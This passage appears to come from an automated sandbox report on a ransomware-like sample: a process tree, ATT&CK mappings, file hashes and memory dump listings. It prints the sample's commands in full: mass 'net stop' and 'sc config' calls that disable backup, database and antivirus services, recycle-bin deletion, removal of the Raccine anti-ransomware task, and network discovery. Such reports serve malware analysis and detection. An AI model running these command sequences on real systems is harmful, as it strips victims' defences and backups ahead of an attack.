  PID:3096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:7936
- C:\Windows\system32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:3484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:2552
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:6532
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:3332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:7808
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:2656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:8168
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:1348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:7944
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:3224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:6136
- C:\Windows\system32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:1840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:8176
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:2824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:8184
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:2532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:7816
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:7652
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.39
  2⤵
  PID:6916
- C:\Windows\system32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:2960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:1316
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:2700
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:3008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:3160
- C:\Windows\system32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:2088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:7432
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6276
- C:\Windows\system32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:3808
- C:\Windows\system32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:3344
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:2304
- C:\Windows\system32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:2860
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:2052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:7024
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:2444
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:2832
- C:\Windows\system32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:796
- C:\Windows\system32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:7032
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
    3⤵
    PID:6848
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2780
- C:\Windows\system32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:2748
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:2648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Clean Service” /y
    3⤵
    PID:7016
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:2108
- C:\Windows\system32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:2220
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:2400
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:1552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
    3⤵
    PID:6824
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:1064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:6832
- C:\Windows\system32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:616
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:700
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:684
- C:\Windows\system32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:2664
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:2632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:7048
- C:\Windows\system32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQL Backups /y
    3⤵
    PID:7068
- C:\Windows\system32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:2264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Enterprise Client Service” /y
    3⤵
    PID:7080
- C:\Windows\system32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:2340
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:2476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:6788
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:2552
- C:\Windows\system32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:2236
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:1012
- C:\Windows\system32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:1376
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:916
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1316
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:432
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:2308
- C:\Windows\system32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:2292
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2240
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.38
  2⤵
  PID:1384
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:2160
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2196
- C:\Windows\system32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:3052
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3032
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:2980
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2940
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2880
- C:\Windows\system32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:2848
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:2808
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:2752
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2728
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:2700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:7268
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2676
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:2604
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2416
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:2324
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:2280
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:2260
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:2148
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2132
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:2104
- C:\Windows\system32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:2084
- C:\Windows\system32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:1672
- C:\Windows\system32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:776
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1640
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1316
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1604
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1384
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1504
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1676
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1832
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:324
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1376
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAEBE.bat
  2⤵
  PID:2284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start upnphost /y
1⤵
PID:2360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:2376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:2388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
1⤵
PID:2404

C:\Windows\system32\net.exe
net view
1⤵
- Discovers systems in the same network
PID:3268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:4020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:2164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:4728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1⤵
PID:4760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:4888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:4736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:4912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:5468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:5452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:5484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:5368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:5384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:6284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:6276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:6252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:6260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:5136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:5188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:1392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:5392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:6148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:6188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:6172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:6164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:5512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:6228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:6196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:6856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:6840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:7008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:6816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:6236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:6244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Dnscache /y
1⤵
PID:2352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:2456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
1⤵
PID:2444
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
  2⤵
  PID:3108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1⤵
PID:2436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:2428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:7280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:7904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:7976

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03bd1eb2-71f8-4ecd-ae50-865ff7dc6145

MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_76cc04d5-8154-45d9-8e40-8274a568505d

MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80ff2765-df0e-488a-9bc1-83c09ba8c91b

MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8f43b670-1d58-4302-a3be-46c237fc9041

MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b152869a-38b0-4d21-80bb-9570fbdd0682

MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d3332397-de88-411f-8c27-2a0db21b1205

MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
b7836436cfa296b813d9cbb4161b724f

SHA1
d3013800e7321b1a0f44536f14aa3b7022c1313c

SHA256
7daa24eaa91b1fda90ebd7fe245466f9e7a4a41ab5d30553da38e3d805b747ec

SHA512
20cbaa1bd22bb14c0c4619730fe5042ac1dffece783f3178bc01e00fc7a86482b6168d745fe03e3d758a6923d20a153f2ab5027ae61f4cbf2800d27cc63ef23e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
df65442272455afc17aef10b85dd7634

SHA1
3e5f72a8f2c9274b2b7da01664d0365f724f33ba

SHA256
630e96c1d0b2003206cf7589eac648b7e637f400c8df93f0c5cb2b48bce413c1

SHA512
a0addafc31c503d74e775df224421c114ceaa2ae6163a91643ff2d0fb4a389e52badc5ebb08d0ecc6174e6d59260ebe5feb2acc0a34708c40540c8e7ed7f3802

Download Submit
C:\Users\Admin\AppData\Local\Temp\5pficimn.exe

MD5
18126be163eb7df2194bb902c359ba8e

SHA1
6c79d9ca8bf0a3b5f04d317165f48d4eedd04d40

SHA256
a9affdcdb398d437e2e1cd9bc1ccf2d101d79fc6d87e95e960e50847a141faa4

SHA512
4a692579afd1536f70b6ded199d05b1e40d70cb0eae7511f2965f88cc5b024bc55c3a7b3dc90d9b88971f1cd562bb93827707d1cf3c7772fa669632bac2cf1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Instruction.txt

MD5
6a27bffa7664f5d2f51012119ce5c962

SHA1
c52060bc8bb4deae1cdda87068120eafced16de5

SHA256
cb3a7fc47e6ac221e07db2d6c13358923f116320a153fdef445c5f6649f9a5fb

SHA512
552779dff311bd28151f4a8d84f0540e6be98f44ed7781e319668f9377d7d73d0b591ee03fa360975a840f6a5be03502d51c55e277e5e4a30bb56162bcaa2e18

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
4297db3b38d8683bd0ab4c78230c8d65

SHA1
c6b1a0b562d4f0172b7308808136975745d92630

SHA256
01dfef5fdc5f0c40bb1dcad451067160c39d483df6e7c5ac2162ed7807002383

SHA512
7032e7f1d6fe7735570095bd6e87dd73e7e0ba3ff223b5f81a042d413cc9b1ed76c37991faf7fa4fe72c20eeff27dc12a5111fe98d006f49e6cba7ecebf0ce8c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
4297db3b38d8683bd0ab4c78230c8d65

SHA1
c6b1a0b562d4f0172b7308808136975745d92630

SHA256
01dfef5fdc5f0c40bb1dcad451067160c39d483df6e7c5ac2162ed7807002383

SHA512
7032e7f1d6fe7735570095bd6e87dd73e7e0ba3ff223b5f81a042d413cc9b1ed76c37991faf7fa4fe72c20eeff27dc12a5111fe98d006f49e6cba7ecebf0ce8c

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/324-108-0x0000000000000000-mapping.dmp

Download
memory/372-60-0x0000000000D10000-0x0000000000D11000-memory.dmp

Filesize
4KB

Download
memory/372-62-0x000000001AFF0000-0x000000001AFF2000-memory.dmp

Filesize
8KB

Download
memory/432-107-0x0000000000000000-mapping.dmp

Download
memory/468-76-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/468-97-0x00000000027D0000-0x00000000027D1000-memory.dmp

Filesize
4KB

Download
memory/468-98-0x00000000027E0000-0x00000000027E1000-memory.dmp

Filesize
4KB

Download
memory/468-84-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/468-68-0x0000000001D40000-0x0000000001D41000-memory.dmp

Filesize
4KB

Download
memory/468-65-0x000007FEFBF11000-0x000007FEFBF13000-memory.dmp

Filesize
8KB

Download
memory/468-64-0x0000000000000000-mapping.dmp

Download
memory/468-81-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/468-78-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
memory/468-75-0x0000000002924000-0x0000000002926000-memory.dmp

Filesize
8KB

Download
memory/468-72-0x0000000002920000-0x0000000002922000-memory.dmp

Filesize
8KB

Download
memory/776-123-0x0000000000000000-mapping.dmp

Download
memory/916-117-0x0000000000000000-mapping.dmp

Download
memory/1012-114-0x0000000000000000-mapping.dmp

Download
memory/1140-111-0x0000000000000000-mapping.dmp

Download
memory/1316-121-0x0000000000000000-mapping.dmp

Download
memory/1376-106-0x0000000000000000-mapping.dmp

Download
memory/1384-116-0x0000000000000000-mapping.dmp

Download
memory/1504-115-0x0000000000000000-mapping.dmp

Download
memory/1596-105-0x0000000000000000-mapping.dmp

Download
memory/1604-120-0x0000000000000000-mapping.dmp

Download
memory/1640-122-0x0000000000000000-mapping.dmp

Download
memory/1672-124-0x0000000000000000-mapping.dmp

Download
memory/1676-113-0x0000000000000000-mapping.dmp

Download
memory/1684-70-0x000000001ACB0000-0x000000001ACB1000-memory.dmp

Filesize
4KB

Download
memory/1684-73-0x000000001AC30000-0x000000001AC32000-memory.dmp

Filesize
8KB

Download
memory/1684-63-0x0000000000000000-mapping.dmp

Download
memory/1684-74-0x000000001AC34000-0x000000001AC36000-memory.dmp

Filesize
8KB

Download
memory/1832-110-0x0000000000000000-mapping.dmp

Download
memory/1836-109-0x0000000000000000-mapping.dmp

Download
memory/1840-112-0x0000000000000000-mapping.dmp

Download
memory/2084-125-0x0000000000000000-mapping.dmp

Download
memory/2104-126-0x0000000000000000-mapping.dmp

Download
memory/2116-167-0x0000000000000000-mapping.dmp

Download
memory/2116-175-0x0000000002070000-0x0000000002071000-memory.dmp

Filesize
4KB

Download
memory/2116-176-0x000000001AC40000-0x000000001AC42000-memory.dmp

Filesize
8KB

Download
memory/2132-127-0x0000000000000000-mapping.dmp

Download
memory/2148-128-0x0000000000000000-mapping.dmp

Download
memory/2160-170-0x0000000000000000-mapping.dmp

Download
memory/2184-129-0x0000000000000000-mapping.dmp

Download
memory/2196-169-0x0000000000000000-mapping.dmp

Download
memory/2224-130-0x0000000000000000-mapping.dmp

Download
memory/2240-172-0x0000000000000000-mapping.dmp

Download
memory/2260-131-0x0000000000000000-mapping.dmp

Download
memory/2280-132-0x0000000000000000-mapping.dmp

Download
memory/2324-133-0x0000000000000000-mapping.dmp

Download
memory/2352-143-0x0000000000000000-mapping.dmp

Download
memory/2360-134-0x0000000000000000-mapping.dmp

Download
memory/2376-135-0x0000000000000000-mapping.dmp

Download
memory/2388-136-0x0000000000000000-mapping.dmp

Download
memory/2404-137-0x0000000000000000-mapping.dmp

Download
memory/2416-138-0x0000000000000000-mapping.dmp

Download
memory/2428-141-0x0000000000000000-mapping.dmp

Download
memory/2436-142-0x0000000000000000-mapping.dmp

Download
memory/2444-139-0x0000000000000000-mapping.dmp

Download
memory/2456-140-0x0000000000000000-mapping.dmp

Download
memory/2492-144-0x0000000000000000-mapping.dmp

Download
memory/2524-145-0x0000000000000000-mapping.dmp

Download
memory/2556-146-0x0000000000000000-mapping.dmp

Download
memory/2604-147-0x0000000000000000-mapping.dmp

Download
memory/2616-148-0x0000000000000000-mapping.dmp

Download
memory/2640-149-0x0000000000000000-mapping.dmp

Download
memory/2676-150-0x0000000000000000-mapping.dmp

Download
memory/2700-151-0x0000000000000000-mapping.dmp

Download
memory/2728-152-0x0000000000000000-mapping.dmp

Download
memory/2752-153-0x0000000000000000-mapping.dmp

Download
memory/2784-156-0x0000000000000000-mapping.dmp

Download
memory/2808-157-0x0000000000000000-mapping.dmp

Download
memory/2848-158-0x0000000000000000-mapping.dmp

Download
memory/2880-159-0x0000000000000000-mapping.dmp

Download
memory/2920-160-0x0000000000000000-mapping.dmp

Download
memory/2940-161-0x0000000000000000-mapping.dmp

Download
memory/2980-162-0x0000000000000000-mapping.dmp

Download
memory/3000-163-0x0000000000000000-mapping.dmp

Download
memory/3032-164-0x0000000000000000-mapping.dmp

Download
memory/3052-165-0x0000000000000000-mapping.dmp

Download
memory/3064-166-0x0000000000000000-mapping.dmp

Download